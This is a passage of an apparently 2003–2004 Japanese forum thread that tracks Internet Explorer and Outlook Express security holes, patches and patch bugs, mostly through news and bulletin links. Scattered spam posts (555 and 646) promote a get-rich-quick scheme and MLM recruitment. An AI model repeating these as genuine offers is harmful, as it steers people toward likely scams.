546 :名無しさん@お腹いっぱい。:03/06/27 01:23
>>545
ODNのCD-ROMを店からもらってきた方が後々いいかもしれない

547 :名無しさん@お腹いっぱい。:03/06/27 07:35
>>545
Meのサポートが終了するまでという名目で復活させたようだが
やはりMicrosoft VMが入ってるからというのが真相だろうな
そういや控訴審はどうなったんだ? 今月あたり判決が出るはずなんだが

548 :名無しさん@お腹いっぱい。:03/06/27 12:30
http://www.zdnet.co.jp/news/0306/27/nebt_18.html
判決出た。搭載命令は撤回

549 :名無しさん@お腹いっぱい。:03/06/27 13:30
米Sunと米MSのJava訴訟,Java搭載の仮命令は差し戻し
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030627/6/

550 :名無しさん@お腹いっぱい。:03/06/27 17:19
>>545
ie5setup.exeはダウソできたものの、Download Siteに接続するとすぐエラーになってしまう。
cab一式はサーバから削除されてしまってるんじゃないか?

551 :名無しさん@お腹いっぱい。:03/06/27 17:44
>>550
そうか。じゃ、やっぱりODNのCD-ROM貰ってくるしかないか…

552 :名無しさん@お腹いっぱい。:03/06/28 00:37
>>551
駅に置いてあるやつでいいの?

553 :名無しさん@お腹いっぱい。 :03/06/28 19:39
WIN98だが、もうすぐアップデートできなくなるらしい。
DirectX 9.0a ?(DirectX 9.0a には、セキュリティとパフォーマンスを向上するための
更新と、DirectX テクノロジのすべてにわたる新機能が含まれていますという説明の
もの)、ダウンロードしておいたほうが良い?
ダウンロードしてなにか問題がなかったでしょうか? あったような?

554 :名無しさん@お腹いっぱい。:03/06/28 19:52
>>553
( ゚д゚)ポカーン

555 :名無しさん@お腹いっぱい。:03/06/28 20:00
私のところにメールが頻繁に届きます。
本当に簡単な仕事ですか?と聞かれますので
答えました。簡単なビジネスです。1日の労働時間は
2時間です。皆さんは0円から行い、
最終的に年商3000万円を目指してください。
ちゃんと教えます。稼ぎ方をおしえますので安心してください。
http://www.c-gmf.com/farewell/box08.htm

556 :名無しさん@お腹いっぱい。:03/06/29 00:58
>>553
Windows98 はあと3、4年ぐらい不滅です!Part2
http://pc2.2ch.net/test/read.cgi/win/1055040506/l50

557 :名無しさん@お腹いっぱい。:03/07/02 11:22
EdMax, WeMail32など複数のWindowsメーラにセキュリティホール
http://slashdot.jp/security/
[memo:6145] 複数のメールソフトに不適切なセキュリティゾーンが適用される欠陥
http://memo.st.ryukoku.ac.jp/archive/200307.month/6145.html

558 :名無しさん@お腹いっぱい。:03/07/04 00:37
OEを糞といってた諸君、一言どうぞ。

559 :名無しさん@お腹いっぱい。:03/07/04 06:15
Outlook Express6SP1を使っています。
ツール<オプション<メンテナンス<最適化で以下のメッセージが表示されました。
いままで一度も出たことがありません。
このメッセージについて情報をお持ちの方はいらっしゃいませんでしょうか。
Outlook Expressのフォルダは別ドライブに移動してありますが、
移動後もこれまではうまく動いたと記憶しています。

環境はxpsp1 
関係ありそうなアプリはVB2003、ZoneAlarm(フリー版3.7.193)でしょうか。
ちょっと気持ちが悪いので情報提供方よろしくお願いします。

---------------------------
Outlook Express
---------------------------
Outlook Express またはほかのアプリケーションがこのフォルダを使用しています。
---------------------------
OK キャンセル
---------------------------


560 :559:03/07/04 06:19
追加です。
アプリとしては上記のほか、
SpywareBlaster(スパイウエアブラスター)でオールチェック
Spybot(スパイボット)で免疫化適用
AdAware(アドアウエア)で定期チェック です。
よろしくお願いします。

561 :名無しさん@お腹いっぱい。:03/07/04 18:15
>>558
HTMLプレビューを許可した状態なら起きるというので、わざと切り替えない限りはOEよりは可能性は低い。

562 :名無しさん@お腹いっぱい。:03/07/04 19:30

(;´Д`)

563 :名無しさん@お腹いっぱい。:03/07/04 22:28
>>559
最適化中に送受信が入るとそのメッセージが出る。

564 :名無しさん@お腹いっぱい。:03/07/05 00:11
>>561
OEはだいぶ前に対策済みでプレビュー許可しても発生しませんが、何か?
OEが塞いだ後も指摘されるまで放置してたという事は、OEが塞いだ他の穴も
放置されてる可能性が高いという事ですな。

565 :559:03/07/05 15:37
>>563
やはりそうですか。そんな感じはしていました。
受信は当時1分間隔でチェックに設定していました。
それにしても、受信を完了させた直後でも上記の現象が出ていました。
現在はなぜか治りましたが、未知のスパイかウイルスかその類を
知らずに飼育していたのかもしれないと思って、
気持ち悪くて質問しました。検索はかなりしました。
現象が再発したらまたお尋ねしたく思います。

566 :名無しさん@お腹いっぱい。:03/07/05 18:54
>>556

おお、ありがとう。
私は普段はセキュリティ板しか見ていないので、、(反省)。
亀レスになってしまいました(汗)。

567 :名無しさん@お腹いっぱい。:03/07/08 00:33
>>557対応状況
Winbiffユーザーの皆様へ重要なお知らせ
http://www.orangesoft.co.jp/Winbiff20/secholl_20030317.html
ドラえもんメールアップデートモジュール公開のお知らせ
http://www.doraemon-mail.com/support/update.html
WeMail32 Ver.2.10beta1をリリースしました
http://www.ntes.co.jp/WeMail/whatsnew.html
EdMax更新履歴
http://www.edcom.jp/edmdes1.html
EdMaxフリー版更新履歴
http://www.edcom.jp/edmfree.html

568 :名無しさん@お腹いっぱい。:03/07/08 00:57
問題点は、OEは対策されるまで公表されない場合が多い。
他のメーラはOEで公表後、後追いでの対策になる。

569 :名無しさん@お腹いっぱい。:03/07/08 10:03
> OEは対策されるまで公表されない場合が多い。
あたりまえだろ、対策前に公表されたらアタックされるぞ

570 :名無しさん@お腹いっぱい。:03/07/08 10:05
まぁ、公表されても見ないあほが多いけどな。

571 :名無しさん@お腹いっぱい。:03/07/08 11:44
[Full-Disclosure] Internet Explorer 6 DoS Bug
http://lists.netsys.com/pipermail/full-disclosure/2003-July/010964.html
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/07.html#20030708_aux

572 :名無しさん@お腹いっぱい。:03/07/08 13:47
>>571
Windows ME + IE 6 SP1でも、アドレスバーに c:\aux と入力して
enter すると IE 6 SP1がフリーズした。

573 :(;´Д`):03/07/08 14:33
(;´Д`)感動した
http://homepage3.nifty.com/coco-nut/

574 :名無しさん@お腹いっぱい。:03/07/08 21:49
>>571-572
Internet Explorer 6が「c:\aux」でフリーズするバグ
http://www.zdnet.co.jp/enterprise/0307/08/epn16.html

575 :名無しさん@お腹いっぱい。:03/07/10 15:52
Windowsに3種類の深刻なセキュリティ・ホール,すべてのユーザーが対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030710/3/

(1)HTML コンバータのバッファ オーバーランにより,コードが実行される(823559)(MS03-023)
(2)Windows のバッファ オーバーランによりデータが破損する(817606)(MS03-024)
(3)ユーティリティ マネージャによる Windows メッセージ処理の問題により,権限が昇格する(822679)(MS03-025)

576 :_:03/07/10 16:29
http://homepage.mac.com/hiroyuki44/

577 :あい:03/07/10 20:31
みてね! 
http://akipon.free-city.net/page003.html

578 :名無しさん@お腹いっぱい。:03/07/10 23:57
>>575
不具合報告あり。
windows updateしたときに上げるスレ 6
http://pc2.2ch.net/test/read.cgi/win/1057833448/l50

579 :名無しさん@お腹いっぱい。:03/07/11 15:12
WebブラウザOperaにサービス拒否攻撃を受ける新しい弱点
http://itpro.nikkeibp.co.jp/free/NT/WinSecurity/20030710/1/

580 :名無しさん@お腹いっぱい。:03/07/11 16:28
>>579
関係ないだろ、スレのタイトル読めない?

581 :名無しさん@お腹いっぱい。:03/07/11 21:10
>580
脳みそがクラックされてるから仕方ない

582 :名無しさん@お腹いっぱい。:03/07/11 21:35
HTML コンバータのバッファ オーバーランにより、コードが実行される
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp
厳密にはIEやOEのセキュリティホールではないが、
喰らうタイミングがIEでWebページを見たときやOEでHTMLメールを
開いたときだから貼っとく。

583 :名無しさん@お腹いっぱい。:03/07/12 17:41
>>579-581
IE/OEの代替でOpera勧める人がいるから、貼っといても無駄ではないと思う。

584 :名無しさん@お腹いっぱい。:03/07/13 00:36
>>582はたぶんalign buffer overflowの修正だ。
http://www.pivx.com/larholm/unpatched/
「スクリプトによる貼り付け処理」を無効にすることで回避できるって書いてるし

585 :名無しさん@お腹いっぱい。:03/07/14 00:51
>>583
だったらOperaのスレでやってくれ。
ここはIE/OE使う人のためのスレ。

586 :山崎 渉:03/07/15 11:07

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

587 :名無しさん@お腹いっぱい。:03/07/15 15:29
保守

588 :名無しさん@お腹いっぱい。:03/07/15 17:02
>>585
IE/OE使う人だけのためのスレじゃなくて、
より安全なブラウザ・メーラを建設的に話すスレ>>1でもあったんじゃない?
IE/OEの話題がメインだとしても。

589 :名無しさん@お腹いっぱい。:03/07/15 17:10
1 July 2003: There are currently 19 unpatched vulnerabilities.
http://www.pivx.com/larholm/unpatched/

590 :名無しさん@お腹いっぱい。:03/07/15 17:12
↑Unpatched IE security holes

591 :名無しさん@お腹いっぱい。:03/07/15 21:04
>>588
IEコンポーネントの話ならともかく
Opera自体については完全にスレ違い。
そういったことはOperaのスレッドでどうぞ。

592 :1:03/07/15 23:36
いつのまに"IE/OE使う人のためのスレ"になったんだ…

593 :名無しさん@お腹いっぱい。:03/07/15 23:39
>>592
Operaの話題はOperaのスレでやれってことでしょ?
それとスレは君の私有物ではないよ

594 :名無しさん@お腹いっぱい。:03/07/16 00:08
セキュリティパッチ情報集積所でも立てるか

595 :名無しさん@お腹いっぱい。:03/07/16 23:43
漏れも全部一緒のほうがありがたい

596 :名無しさん@お腹いっぱい。:03/07/18 14:30
http://www.microsoft.com/japan/technet/security/fixedhome.asp
しかし、わかりにくいところにあるなw

597 :名無しさん@お腹いっぱい。:03/07/24 18:47

「MS03-030: DirectX の未チェックのバッファにより、コンピュータが侵害される(819696)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-030ov.asp

598 :???:03/07/24 18:48

期間限定!もうお目にかかれない!

http://alink3.uic.to/user/angeler.html

599 :名無しさん@お腹いっぱい。:03/07/31 17:06
http://altba.com/bakera/hatomaru.aspx/ebi/genre/00490045
>XML の CDATA 区間の中に object を書かれると、何故か「マイコンピュータ」ゾーンの
>セキュリティレベルで実行されてしまうようです
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie

これってもう対策されたんだっけ?

600 :名無しさん@お腹いっぱい。:03/07/31 20:53
600げっっとーーーーーおぉ!!

601 :ぼるじょあ ◆yBEncckFOU :03/08/02 04:50
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

602 :名無しさん@お腹いっぱい。:03/08/03 01:34
hage

603 :名無しさん@お腹いっぱい。:03/08/05 17:03
>>599
とっくに対策されてるがそこに書かれている対処自体は
実行したほうがいい。
面倒ならWindows Update以外は常に制限ユーザーでIEを使え

604 :名無しさん@お腹いっぱい。:03/08/13 14:14
いろいろ読ませてもらったけど、つまるところ
OEであれIEコンポーネント使用メーラーであれ、
IEと連携しないように、すべてのメッセージをテキスト形式で受信すれば
何ら問題ないわけですね。


605 :名無しさん@お腹いっぱい。:03/08/13 15:17
>>604
違う。セキュリティホールを考慮してない。

606 :名無しさん@お腹いっぱい。:03/08/15 11:21
すべてテキスト形式で受信するなら
IEコンポーネントいらないじゃん

607 :名無しさん@お腹いっぱい。:03/08/15 20:12
OEの開発、提供停止
http://www.zdnet.com.au/newstech/ebusiness/story/0,2000048590,20277192,00.htm

608 :名無しさん@お腹いっぱい。:03/08/15 20:34
>>607
メーラー作者は(゚д゚)ウマーか

609 :山崎 渉:03/08/15 22:26
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

610 :ぼるじょあ ◆yBEncckFOU :03/08/17 22:27
(・3・) エェー

611 :名無しさん@お腹いっぱい。:03/08/21 14:08
IEに「緊急」の脆弱性、累積パッチリリース

http://www.zdnet.co.jp/enterprise/0308/21/epn02.html

612 :名無しさん@お腹いっぱい。:03/09/06 01:28
Windows XP Service Pack 1 適用のお願い
- Windows XP 初期出荷版(SP1 未適用製品)向け修正プ ログラム提供終了のお知らせ
更新日: 2003 年 9 月 5 日
http://www.microsoft.com/japan/windowsxp/endofgold.asp

613 :名無しさん@お腹いっぱい。:03/09/11 10:19
○「MS03-039: RPCSS サービスのバッファ オーバーランによりコードが実行され
る (824146)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-039ov.asp

○Internet Explorer 用の累積的な修正プログラム (822925) (MS03-032)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-032.asp
今回の更新内容
このセキュリティ情報ページを更新し、このセキュリティ情報で提供された
修正プログラムが 「オブジェクト タグの脆弱性」 (CAN-2003-0532) を適切に
修正しないという報告についての情報を追加しました。

○Windows カーネル メッセージ処理のバッファ オーバーランにより、
権限が昇格する (811493) (MS03-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013.asp

○RPC インターフェイスのバッファ オーバーランによりコードが実行される
(823980) (MS03-026)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-026.asp

614 :名無しさん@お腹いっぱい。:03/09/11 13:34
IEのパッチに問題発覚,適用しても解消で きないセキュリティ・ホールが存在
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030909/1/

Windowsにまたもや“超特大”のセキュリ ティ・ホール,すぐにWindows Updateの実施を
第2,第3の「Blaster」ワームが出現する恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030911/1/

615 :名無しさん@お腹いっぱい。:03/09/13 21:57
致命的な奴が8つも追加…
http://www.pivx.com/larholm/unpatched/

616 :名無しさん@お腹いっぱい。:03/09/20 00:57
2年前の脆弱性を突いた新ウイルスが拡散
http://www.zdnet.co.jp/enterprise/0309/19/epn03.html

W32.Swen.A@mm
http://www.symantec.com/region/jp/sarcj/data/w/w32.swen.a@mm.html
WORM_SWEN.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SWEN.A&VSect=T
W32/Swen@MM
http://www.nai.com/japan/security/virS.asp?v=W32/Swen@MM

617 :名無しさん@お腹いっぱい。:03/10/04 19:10
MS03-040: Internet Explorer 用の累積的な修正プログラム (828750)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-040ov.asp

618 :名無しさん@お腹いっぱい。:03/10/05 23:26
マイクロソフト、IE 5.01以後が対象の緊急の脆弱性「MS03-040」
http://internet.watch.impress.co.jp/cda/news/2003/10/04/654.html

米MS、とんだお粗末-重大な脆弱性用のパッチが役に立たず
http://japan.cnet.com/news/ent/story/0,2000047623,20060815,00.htm

619 :名無しさん@お腹いっぱい。:03/10/06 17:07
IEに危険なセキュリティ・ホール,
WebページやHTMLメールを見るだけで被害を受ける

今回の累積パッチでは,過去のパッチでふさげなかった
セキュリティ・ホールも修正

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031005/135316/

620 :名無しさん@お腹いっぱい。:03/10/17 09:20
後を絶たないIEのセキュリティ・ホール,設定変更などで“自衛”を
続々見つかるパッチの不具合,パッチ未公開のホールを狙うウイルスも
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031014/1/

621 :名無しさん@お腹いっぱい。:03/10/29 12:01
「ネットにつなぐだけで攻撃を受ける」――第三の“超特大”セキュリティ・ホールを解説する
Exploitが既に公開,パッチを適用してもメッセンジャ サービスは無効に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031028/1/

IE/OEと関係ないのでsage

622 :名無しさん@お腹いっぱい。:03/11/08 06:27
IEを起動するとthesten.comという外国のアダルトサイトがホームページになっていて、
お気に入りに3つのそのサイトへのリンクが毎回入っています。
履歴やクッキーやゴミ箱の内容など全て消去しても絶対に起動したときに表示されます。

どのたか改善方法を教えてください。

623 :((((((;゚Д゚))))))ガクガクブルブル :03/11/08 08:10
http://pc2.2ch.net/test/read.cgi/pcqa/1067657959/

>>622
ここ逝こうね。
それと、ここで質問する前に、
最低限1から書かれているFAQとか読んで、
書かれていること実行してみて、だめだったら
質問したほうがいいよ。それと、これ、マルチじゃないよね

624 :名無しさん@お腹いっぱい。:03/11/12 02:57
Internet Explorer 用の累積的な修正プログラム (828750) (MS03-040)

最大深刻度 :緊急

影響を受けるソフトウェア :
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6
Microsoft Internet Explorer 6 for Windows Server 2003

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-040.asp

625 :名無しさん@お腹いっぱい。:03/11/12 03:03
↑ミス
Internet Explorer 6 SP1 用の累積的な修正プログラム (KB824145)
が出ているので、各自WindowsUpdateされたし。
現時点ではTechNetに情報なし。


626 :SMTP信号機:03/11/12 03:06
サーバ関連情報レジストリがばれている限り貴方のPCに侵入した自己散布型ウイルスは自分を撒き散らします。
かといってOEの類を使うのを止めるのはしゃくですよね?
だから作りました。
貴方のPCが迷惑メール送信の加害者にならない為に・・・
http://homepage3.nifty.com/tokeon/Eng-B/SMTPmv.html
JavaですからLinuxPCでも動くには動きます。

627 :名無しさん@お腹いっぱい。:03/11/12 14:27
IEに「緊急」のセキュリティ・ホール,マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031112/136355/

MS、WindowsとOfficeの脆弱性修正パッチリリース
http://www.zdnet.co.jp/enterprise/0311/12/epn05.html
米マイクロソフト、米祝日にセキュリティパッチをリリース
http://japan.cnet.com/news/ent/story/0,2000047623,20061917,00.htm

628 :名無しさん@お腹いっぱい。:03/11/12 14:30
MS03-048 - Internet Explorer 用の累積的なセキュリティ更新 (824145)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp
●影響を受けるソフトウェア
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows XP 64 bit Edition
・Microsoft Windows XP 64 bit Edition Version 2003
・Microsoft Windows Server 2003
・Microsoft Windows Server 2003 64 bit Edition
●影響
リモートからのコード実行

629 :名無しさん@お腹いっぱい。:03/11/12 14:40
>>1
選択肢

(1)Datula、Netscape7.1 Mail、Edmaxなどを使う


630 :名無しさん@お腹いっぱい。:03/11/12 14:57
部バージョンの「Eudora for Windows」にバッファオーバーフ
ローの脆弱性
http://www.zdnet.co.jp/enterprise/0311/12/epn06.html

631 :名無しさん@お腹いっぱい。:03/11/12 19:17
q824145.exe /q:a /r:n

これも出来たとはな (´ー`) フッ

632 :名無しさん@お腹いっぱい。:03/11/12 19:17
誤爆したぜ

633 :名無しさん@お腹いっぱい。:03/11/19 19:53
IEにパッチを当てるとスクロール操作に不具合,パッチの品質に改めて注意が必要
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20031118/1/

スクロールバーの空白部分をクリックすると画面スクロールが正しく行われない
http://support.microsoft.com/default.aspx?scid=kb;ja;832270

634 :名無しさん@お腹いっぱい。:03/11/29 20:24
IEに複数のセキュリティ・ホール,対策はアクティブスクリプトを無効にすること
ホールを突くデモ・ページが公開中,最新パッチを適用していても影響を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031128/136983/

635 :名無しさん@お腹いっぱい。:03/11/30 01:40
Internet Explorer System Compromise Vulnerabilities
http://secunia.com/advisories/10289/
Internet Explorerの新セキュリティホールは「極めて危険」
http://www.zdnet.co.jp/enterprise/0311/26/epi02.html

Opera:特定のMIMEタイプを持つデータがユーザーに無許可でダウンロード・実行される問題
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j104

636 :名無しさん@お腹いっぱい。:03/11/30 01:57
最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
どうなの?


637 :名無しさん@お腹いっぱい。:03/11/30 03:25
> 最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
> どうなの?

まぁ、Windows自体に依存してるからね…。

WindowsがIEにも依存してるし。 <= help等

638 :636:03/11/30 03:44
>> 637

そうだねー。でも OS が web browser に依存しているというのは。
完全に逆なんじゃないのかなあ?

少なくともセキュリティー関連のものは独自の仕組で
アップデートとか出来た方が安心だと思うのは間違いだろうか。
だからといって完璧ではないだろうけど、若干ましな気がする。

639 :名無しさん@お腹いっぱい。:03/12/03 14:31
IEを使い続けるリスクを再認識しよう
パッチには複数の不具合,パッチ未公開のセキュリティ・ホールが続出
今週のSecurity Check [Windows編] (第108回,2003年12月3日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031202/1/

640 :名無しさん@お腹いっぱい。:03/12/11 21:36
IEにURLを偽装できるパッチ未公開の脆弱性が発見される
〜緊急度が低いため、パッチはまだリリースしない(MS取締役東氏)
http://internet.watch.impress.co.jp/cda/news/2003/12/11/1451.html

641 :名無しさん@お腹いっぱい。:03/12/11 21:40
>>640
ちなみに、Opera7.23ja(3226)だとセキュリティ警告のダイアローグが出る。

642 :名無しさん@お腹いっぱい。:03/12/12 18:06
IEにURLを偽装できるセキュリティ・ホール,安易なクリックは禁物
セキュリティ・ホールを確認するWebページやHTMLメールが公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031211/137400/

ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/12.html#20031211_IE

643 :名無しさん@お腹いっぱい。:03/12/12 18:52
>>641
Opera6.06でも警告を確認。
これ、ある意味新ウイルスに使われそうなのに、マイクロソフトは危険度低なのね・・・

644 :こここ:03/12/13 21:38
JokeVirusってどうやって解除するんですか?

645 :名無しさん@お腹いっぱい。:03/12/20 03:18
@impoでcss読み込んじゃうなんて何考えてんだろうな

646 :名無しさん@お腹いっぱい。:03/12/26 06:41

こんにちは。MLM・NB初心者です。
詳しい方や現在もしくは過去MLM・NBをやられていた方の
ご意見が聞きたくてページ作りました。
よろしくお願いします。

つまらない物ですが、お礼の品も用意しておりますので
ぜひ、どうぞ!

   http://gonbea.fc2web.com/


647 :名無しさん@お腹いっぱい。:04/01/10 22:26
IEに2種類の新たなセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/

648 :名無しさん@お腹いっぱい。:04/01/14 23:22
月例パッチに含まれなかったIEの複数の脆弱性
http://www.itmedia.co.jp/enterprise/0401/14/epn15.html

649 :名無しさん@お腹いっぱい。:04/01/21 18:24
解消されない“URLの偽装問題”,1月もIEのパッチは公開されず
Mozillaは最新版で対応完了,MDACのセキュリティ・ホールにも注意
今週のSecurity Check [Windows編] (第110回,2004年1月21日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040120/1/

650 :名無しさん@お腹いっぱい。:04/01/28 19:48
URL偽装にご注意を!―Symantecのウイルス研究者が警告
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20040128/138984/

651 :名無しさん@お腹いっぱい。:04/01/28 20:53
Microsoft plans to release a software update that modifies
the default behavior of Internet Explorer for handling user
information in HTTP and HTTPS URLs
http://support.microsoft.com/default.aspx?scid=kb;[LN];834489

652 :名無しさん@お腹いっぱい。:04/01/30 18:33
IEに,ダウンロードするファイル名を偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040129/139103/

653 :名無しさん@お腹いっぱい。:04/02/01 15:55
>>652
もうなんでもありでつね

654 :名無しさん@お腹いっぱい。:04/02/02 00:38
IEもうだめぽ

655 :名無しさん@お腹いっぱい。:04/02/03 04:14
レベル緊急。

MS04-004 - Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)


656 :名無しさん@お腹いっぱい。:04/02/03 10:05
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894) (MS04-004)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
2004 年 2 月のセキュリティ情報 (Windows)
http://www.microsoft.com/japan/technet/security/bulletin/winfeb04.asp

657 :名無しさん@お腹いっぱい。:04/02/03 10:08
>>656
影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition

テストした Microsoft Windows および Officeコンポーネント :
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.01 Service Pack 4

658 :名無しさん@お腹いっぱい。:04/02/03 10:17
>>657
Windows 98(SE),Windows Meがないのは、影響がないのではなくて、
サポート終了に伴い評価の対象外になったため。
http://www.microsoft.com/japan/win98/98meExtend.htm
http://www.microsoft.com/japan/win98/98meextendfaq.htm
(有償サポート契約を結んでいない一般ユーザは、
 03年12月31日で98/Meのサポートは終了。)

659 :名無しさん@お腹いっぱい。:04/02/03 11:11
>>658
>>657には98SE,MEはあがってないけど、個別のパッチのところには
98SE、MEもあがっていて適用可能だね。
http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A-47C0-90D3-0C884910BC97&displaylang=ja
>システム要件
>サポートされているオペレーティング システム : Windows 2000 Service Pack 2, Windows 2000 Service Pack 3,
>Windows 2000 Service Pack 4, Windows 98, Windows 98 Second Edition, Windows ME, Windows NT, Windows XP
>この修正プログラムは、次のオペレーティング システム用の Internet Explorer に対して適用されます。
>Windows XP SP1
>Windows XP
>Windows Millennium Edition (Windows Me)
>Windows 2000 SP2
>Windows 2000 SP3
>Windows 2000 SP4
>Windows 98 SE
>Windows NT 4.0 SP6A

660 :名無しさん@お腹いっぱい。:04/02/03 22:33
今回のパッチは良く考えてからインスコした方が良さげ
スクロールはかちゅにも影響してるので直したいのだがw

661 :名無しさん@お腹いっぱい。:04/02/03 23:34
IE 6の最新パッチにトラブル,記憶させたパスワードが表示されなくなる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139279/
MS04-004 Internet Explorer 6 Service Pack 1 用セキュリティ問題の累積的な修正プログラム
(KB832894)の適用後、記憶したはずのユーザー名とパスワードが表示されなくなる
ttp://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/support/sokuho/default.asp#Record_94

マイクロソフト,IEのセキュリティ・パッチを緊急リリース
URLの“偽装問題”を含む,3種類のセキュリティ・ホールを解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139235/
MS、IEの脆弱性に対応の臨時パッチ
http://www.itmedia.co.jp/enterprise/0402/03/epc03.html
IE用の新パッチ発行で電子商取引に混乱の可能性も
http://www.itmedia.co.jp/enterprise/0402/02/epic01.html

662 :名無しさん@お腹いっぱい。:04/02/04 01:59
そもそもブラウザに記録させるようなPASSに、
PASSの意味はあるのかあと小一時間は問い詰めない。

663 :名無しさん@お腹いっぱい。:04/02/04 02:13
>>662ワラタ。

664 :名無しさん@お腹いっぱい。:04/02/05 21:56


665 :名無しさん@お腹いっぱい。:04/02/05 22:40
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice


666 :名無しさん@お腹いっぱい。:04/02/09 00:42
↓IEの脆弱の部分 下記のソフトで補うことが出来るんだろうか?
このソフト使っている人いたら 教えてね

BB de!!スマートブラウジング Ver.1 

667 :名無しさん@お腹いっぱい。:04/02/11 21:07
Opinion:IE臨時パッチをめぐる混乱はなぜ起きたのか
http://www.itmedia.co.jp/enterprise/0402/10/epc17.html

668 :名無しさん@お腹いっぱい。:04/02/18 11:27
漏えいしたWindowsのソースコードから早くもIE 5の脆弱性が発見される
〜リモートから任意のコードを実行可能。IE 6は影響なし
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2118.html
マイクロソフト、複数の脆弱性を攻撃する手口が公開されていると警告
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2125.html

669 :名無しさん@お腹いっぱい。:04/02/18 11:34
流出したWindowsのソース・コードでIE 5のセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040217/139945/
攻撃コードが既に出現,Windowsの“超特大”級セキュリティ・ホールを解説する
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040217/1/

670 :名無しさん@お腹いっぱい。:04/02/18 16:13
ソースコード流出がきっかけで指摘された新たなIEの脆弱性、その影響は?
Windows 2000とWindows NT 4のソースコードの一部がインターネットに流出したことが
明らかになってからわずか2日後、そのコードを元に、Internet Explorerの新たな脆弱
性が指摘された。
http://www.itmedia.co.jp/enterprise/0402/18/epn03.html

671 :名無しさん@お腹いっぱい。:04/02/20 20:01
IEにパッチ未公開のセキュリティ・ホール,攻撃コードも出現している
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040220/140200/

672 :名無しさん@お腹いっぱい。:04/03/01 16:45
IEのフレーム悪用でパスワード漏れ――iDEFENSEが警告
http://www.itmedia.co.jp/enterprise/0403/01/epic01.html

673 :名無しさん@お腹いっぱい。:04/03/04 22:01
Windows XP Service Pack 2ベータ版プレビュー(パート2)後編
「Security Center」,IE,OEのセキュリティ機能
http://itpro.nikkeibp.co.jp/members/NT/WinNext/20040302/2/

674 :名無しさん@お腹いっぱい。:04/03/04 22:06
>673
